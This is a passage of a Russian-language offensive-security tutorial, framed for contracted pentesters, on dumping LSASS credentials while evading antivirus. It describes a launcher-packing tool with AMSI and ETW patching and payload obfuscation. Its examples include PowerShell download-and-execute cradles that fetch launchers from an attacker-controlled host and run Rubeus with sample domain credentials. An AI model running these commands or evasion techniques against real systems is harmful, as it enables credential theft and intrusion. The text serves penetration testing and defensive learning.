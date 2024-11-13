Содержание статьи
- Вводная
- System.Reflection.Assembly. Король умер, да здравствует король!
- Пример 1. Базовый
- Пример 2. Продвинутый
- Пример 3. PowerSharpPack своими руками
- Пишем SafetyNDump. Создание дампа LSASS в обход AV
- Олицетворение SYSTEM из неинтерактивной консоли
- SafetyNDump.Net.WebClient или Resolve-DnsName?
- Пишем SafetyNDump
- Парсинг MiniDump
- Объединение результатов
- Противодействие
Pentest Award
Этот текст получил премию Pentest Award 2024 в категории «Раз bypass, два bypass». Это соревнование ежегодно проводится компанией Awillix.
NanoDump уже успел обрести широкую популярность у вендоров AV/EDR, что поспособствовало написанию для него кучи детектов, поэтому теперь мы можем более свободно поделиться своим опытом его использования на «внутряках».
info
Эта заметка — продолжение темы, начатой в статье «Дампы LSASS для всех, даром, и пусть никто не уйдет обиженный», в которой я показывал, как можно «по‑молодежному» вытаскивать секреты из памяти процесса
lsass. для повышения привилегий в корпоративном домене Active Directory или дальнейших боковых перемещений в недра внутрянки заказчика пентеста.
warning
Статья имеет ознакомительный характер и предназначена для специалистов по безопасности, проводящих тестирование в рамках контракта. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.
Вводная
Для начала немного поностальгируем по временам, когда деревья были зеленее, а антивирусные решения не были так жестоки по отношению к рядовым исполнителям проектов по тестированию на проникновение. В то время (около пяти лет до момента написания статьи) в составе коллекции GhostPack появился интересный инструмент SafetyKatz, в рамках разработки которого исследователь @harmj0y вдохнул новую жизнь в небезызвестный Mimikatz, уже на тот момент «палившийся» всем и вся при его использовании в чистом виде.
SafetyKatz декомпозирует процесс извлечения данных аутентификации из LSASS на два этапа: непосредственное создание дампа с помощью API-ручки
dbghelp. и парсинг полученного дампа посредством модифицированного (уменьшенного по своим возможностям) Mimikatz. Последний, в свою очередь, загружается в память по методу PE Reflection и выполняет захардкоженные команды
sekurlsa:: и
sekurlsa:: в отношении уже созданного ранее дампа памяти. По завершении работы утилиты привнесенные артефакты — минидамп, сохраненный по пути
C:\, — удаляются с файловой системы жертвы.
Такой подход в свое время позволял уменьшить количество детектов использования
sekurlsa:: «на живую», сокращал время на выдергивание хешей и ключей (немалый дамп памяти больше не нужно тащить к себе на тачку) и прятал сигнатуру Mimikatz от статического анализа. Примерно такой же подход долгое время применялся моей командой с тем лишь отличием, что я использовал новомодный NanoDump из памяти для создания слепка памяти и библиотеку на C# — для его парсинга на месте.
Дальше мы рассмотрим поподробнее, как создать свой «SafetyNDump» для фана
и профита, но сперва ознакомимся со вспомогательным инструментарием.
info
Сразу оговорюсь, что далее не будут рассмотрены действующие на момент написания статьи техники обхода AV/EDR для дампа LSASS. Цель публикации — рассказать, как мы долгое время «абьюзили» одну из лазеек уклонения от «Касперского», и тем самым поделиться своим опытом с коллегами, играющими на стороне дефенса. На данный момент описываемый вектор атаки закрыт.
System.Reflection.Assembly. Король умер, да здравствует король!
Мне очень нравится PowerShell и его возможности в контексте наступательной безопасности. В случае, когда в целевой инфраструктуре не зажжен AppLocker + Constrained Language Mode, простота применения этого инструмента Windows-автоматизации на обычных пентестах — просто подарок для моделируемого злоумышленника. На киберучениях с необходимостью скрытого исполнения команд его тоже можно приспособить под нужды исполнителя с помощью патчинга ETW, вызова ранспейса
System. напрямую (я смотрю на тебя, PowerShx!) и других триксов.
Мы будем целиться в исполнение накрафченного на C# кода через механизм
System., что поможет еще больше упростить жизнь этичному злоумышленнику при подключении к сетевым узлам через службу WinRM (Windows Remote Management) или, например, с помощью скриптов
exec. из Impacket.
На просторах интернета есть куча материалов, как выполнять код на «шарпах» через PowerShell, но мне, как обычно, не хватало а‑в-т‑о-м‑а-т‑и-з‑а-ц‑и-и... Поэтому в свободное от работы время я написал простую питонячью утилиту bin2pwsh, которая позволяет конвертировать собранные на C# бинари в лаунчеры на PowerShell.
Кратко опишу ее возможности:
- Автоматически создает «запускаторы» на PowerShell из скомпилированных исполняемых файлов на C# на основе предопределенных шаблонов (классический или с использованием примитивов Emit). Байты исполняемых файлов сперва сжимаются с помощью zlib и оборачиваются в Base64 для их встраивания в код скриптов .ps1.
- Можно использовать безумно крутой инструмент Donut, если нужно запускать неуправляемый код из PowerShell для системных вызовов — прямых (форк Donut от @s4ntiago_p для Linux) или непрямых (закрытый форк Donut от @KlezVirus и Porchetta Industries для Windows с возможностью перехеширования на лету). Само исполнение неуправляемого кода достигается за счет предварительной кросс‑компиляции в Linux (с помощью Mono) или обычной компиляции в Windows (с помощью csc.exe) селф‑инжектора на C# на основе темплейтов от @bohops (Unmanaged Code Execution with .NET Dynamic PInvoke) и @dr4k0nia (HInvoke and avoiding PInvoke). Они работают без статических импортов P/Invoke для вызовов WinAPI. Более подробное описание темплейта инжектора можно найти на GitHub.
- Позволяет применять несложные техники уклонения от AV: патчинг AMSI, ETW, RC4-шифрование полезной нагрузки с помощью встроенных механизмов Windows и обфускация статических строк.
Рассмотрим примеры использования.
Пример 1. Базовый
Это простая упаковка Rubeus в PowerShell-лаунчер на основе стандартного шаблона
System..
curl -sSL https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.0_Any/Rubeus.exe -o Rubeus.exe
bin2pwsh.py Rubeus.exe
IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/Invoke-Rubeus.ps1")Invoke-Rubeus hash /domain:nightcity.net /user:snovvcrash /password:Passw0rd!
Пример 2. Продвинутый
Теперь посмотрим на продвинутую упаковку Rubeus в PowerShell-лаунчер на основе шаблона
System. и его исполнение через запуск селф‑инжектора шелл‑кода, полученного с помощью форка Donut за авторством KlezVirus с динамическим перехешированием непрямых системных вызовов (подробнее о технике рассказывает ролик на YouTube). Чаще всего этот способ используется с нативным кодом, однако паковать таким образом управляемый код также никто не запрещает.
curl -sSL https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.0_Any/Rubeus.exe -o Rubeus.exepy .\bin2pwsh.py 'Rubeus.exe hash /domain:nightcity.net /user:snovvcrash /password:Passw0rd!' -d -wh C:\Tools\SysWhispers3\syswhispers.py -whm jumper_randomized --emit --debug --silent
IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/Invoke-RubeusInject.ps1")Invoke-RubeusInject
Пример 3. PowerSharpPack своими руками
Ну и на сладкое — пример создания аналога репозитория PowerSharpPack (от @ShitSecure) из SharpCollection (от @Flangvik) за считаные секунды.
git clone https://github.com/Flangvik/SharpCollection
cd SharpCollection/NetFramework_4.0_Any
for exe in ./*.exe; do bin2pwsh.py $exe --silent; done
IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/Invoke-Seatbelt.ps1")Invoke-Seatbelt -group=system
Со вспомогательным инструментарием разобрались, вернемся к нашей проблеме. Чтобы оставаться организованными и во имя концепции «разделяй и властвуй», не будем отходить от нарратива декомпозиции SafetyKatz и поочередно рассмотрим создание дампа и его парсинг.
Пишем SafetyNDump. Создание дампа LSASS в обход AV
Итак, первое, с чем нужно разобраться, — это создание дампа памяти
lsass.. Способ должен прокатить с действующим средством защиты.
Олицетворение SYSTEM из неинтерактивной консоли
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